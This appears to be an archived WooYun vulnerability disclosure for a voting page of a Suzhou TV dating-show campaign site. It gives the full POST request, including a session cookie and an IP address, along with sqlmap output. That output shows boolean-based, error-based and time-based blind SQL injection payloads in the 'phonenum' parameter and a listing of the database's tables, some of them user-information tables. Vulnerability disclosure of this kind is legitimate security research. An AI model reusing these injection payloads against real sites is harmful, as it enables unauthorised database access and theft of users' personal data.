乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-10: 细节已通知厂商并且等待厂商处理中 2015-12-14: 厂商已经确认,细节仅向厂商公开 2015-12-24: 细节向核心白帽子及相关领域专家公开 2016-01-03: 细节向普通白帽子公开 2016-01-13: 细节向实习白帽子公开 2016-01-28: 细节向公众公开
《星梦奇缘》"活动(以下简称"活动")系由苏州广播电视总台举办之大型都市单身交友真人秀活动。
POST /home/dovote HTTP/1.1Content-Length: 311Content-Type: application/x-www-form-urlencodedCookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2248440621c7a6c09b4b066b32a7931191%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22124.114.77.200%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A107%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.21+%28KHTML%2C+like+Gecko%29+Chrome%2F41.0.2228.0+Safari%2F537.21%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1449635229%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7Def6e45bd30510dca5b1b4ee805bc92e6; AJSTAT_ok_pages=2; AJSTAT_ok_times=1Host: love.csztv.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*code=94102&phonenum=1&pid=0
sqlmap resumed the following injection point(s) from stored session:---Parameter: phonenum (POST) Type: boolean-based blind Title: MySQL >= 5.0 boolean-based blind - Parameter replace Payload: code=94102&phonenum=(SELECT (CASE WHEN (5354=5354) THEN 5354 ELSE 5354*(SELECT 5354 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&pid=0 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: code=94102&phonenum=1 AND (SELECT 8648 FROM(SELECT COUNT(*),CONCAT(0x7176717071,(SELECT (ELT(8648=8648,1))),0x716a707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&pid=0 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: code=94102&phonenum=1 AND (SELECT * FROM (SELECT(SLEEP(5)))PQyO)&pid=0---web server operating system: Windows or Linux 7 or Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)web application technology: Apache 2.2.22, PHP 5.3.10back-end DBMS: MySQL 5.0Database: lubb+---------------+---------+| Table | Entries |+---------------+---------+| ht_vote_back | 264534 || ht_capta | 40409 || wy_capta | 18659 || wy_vote | 17292 || xm_userinfo | 1759 || xm_capta | 217 || xm_vote | 199 || xm_review | 150 || xm_person | 122 || pi_infomation | 108 || xm_image | 61 || ht_candidate | 55 || lotels | 42 || wy_student | 30 || ht_option | 10 || userinfo | 3 || ht_action | 1 || pi_user | 1 || wy_action | 1 || xm_action | 1 || xm_user | 1 |+---------------+---------+
危害等级:中
漏洞Rank:5
确认时间:2015-12-14 20:19
已经废弃
暂无